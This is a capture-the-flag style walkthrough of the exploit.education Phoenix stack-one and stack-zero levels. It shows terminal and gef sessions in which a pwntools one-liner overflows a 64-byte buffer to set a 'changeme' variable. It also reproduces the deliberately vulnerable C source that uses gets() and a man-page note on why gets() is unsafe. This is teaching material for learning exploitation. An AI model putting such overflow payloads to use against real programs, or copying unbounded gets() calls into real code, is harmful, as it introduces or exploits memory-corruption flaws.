user@phoenix-amd64:~$ python -c "import pwn;print 'A'*64+pwn.p64(0x496c5962)" | xargs /opt/phoenix/amd64/stack-one xargs: WARNING: a NUL character occurred in the input. It cannot be passed through in the argument list. Did you mean to use the --null option?Welcome to phoenix/stack-one, brought to you by https://exploit.educationWell done, you have successfully set changeme to the correct value

gef➤ set args AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbYlIgef➤ runStarting program: /opt/phoenix/amd64/stack-one AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbYlIWelcome to phoenix/stack-one, brought to you by https://exploit.educationWell done, you have successfully set changeme to the correct value[Inferior 1 (process 9363) exited normally]

步骤

/* * phoenix/stack-zero, by https://exploit.education * * The aim is to change the contents of the changeme variable. * * Scientists have recently discovered a previously unknown species of * kangaroos, approximately in the middle of Western Australia. These * kangaroos are remarkable, as their insanely powerful hind legs give them * the ability to jump higher than a one story house (which is approximately * 15 feet, or 4.5 metres), simply because houses can't can't jump. */#include<stdio.h>#include<stdlib.h>#include<string.h>#include<unistd.h>#define BANNER \"Welcome to " LEVELNAME ", brought to you by https://exploit.education"char *gets(char *);intmain(int argc, char **argv){struct {char buffer[64];volatileint changeme; } locals;printf("%s\n", BANNER); locals.changeme = 0; gets(locals.buffer);if (locals.changeme != 0) {puts("Well done, the 'changeme' variable has been changed!"); } else {puts("Uh oh, 'changeme' has not yet been changed. Would you like to try ""again?"); }exit(0);}

$ man gets...DESCRIPTION ... The gets() function is equivalent to fgets() with an infinite size and a stream of stdin, except that the newline character (if any) is not stored in the string. It is the caller's responsibility to ensure that the input line, if any, is sufficiently short to fit in the string....SECURITY CONSIDERATIONS The gets() function cannot be used securely. Because of its lack of bounds checking, and the inability for the calling program to reliably determine the length of the next incoming line, the use of this function enables malicious users to arbitrarily change a running program's functionality through a buffer overflow attack. It is strongly suggested that the fgets() function be used in all cases. (See the FSA.)